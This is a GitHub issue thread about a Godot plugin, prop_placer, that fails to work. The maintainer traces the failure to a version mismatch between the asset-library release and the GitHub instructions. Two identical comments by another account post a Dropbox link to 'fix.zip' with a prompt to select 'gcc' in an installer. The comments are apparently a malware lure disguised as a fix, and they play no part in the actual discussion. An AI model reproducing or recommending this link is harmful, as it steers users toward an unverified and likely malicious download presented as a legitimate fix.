### ISSUE TITLE
doesn't work

### ISSUE THREAD

**Issue by ianmckenna87** [fstxz/prop_placer#10]
I have the menu open when dragging files from the file dock and this plugin seems to do nothing for me

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by fstxz** [comment]
Are there any errors in the console? What version of Godot are you using? And what version of the plugin?

**Comment by ianmckenna87** [comment]
4.3 and I didn't see any errors, downloaded the plugin from the asset library

**Comment by fstxz** [comment]
Did you follow instructions on this github page or asset library page? Instructions on github are for newer version which hasn't been released yet.

**Comment by ianmckenna87** [comment]
Ahh.. that is probably it then. I installed from asset library and viewed
the github page for instructions. Didn't realize they weren't the same
version.

I noticed 0.9's instructions doesn't mention collections, have those been removed?

**Comment by fstxz** [comment]
Yeah, sorry for the confusion. I added a note in the readme about this for future users.

> I noticed 0.9's instructions doesn't mention collections, have those been removed?

Yes, in 0.9 you use Godot's filesystem dock directly instead of manually creating collections, but this doesn't work fully because of the bug in the engine. The fix will be included in Godot 4.4 and hopefully backported to 4.3 and 4.2, but I don't know when exactly.
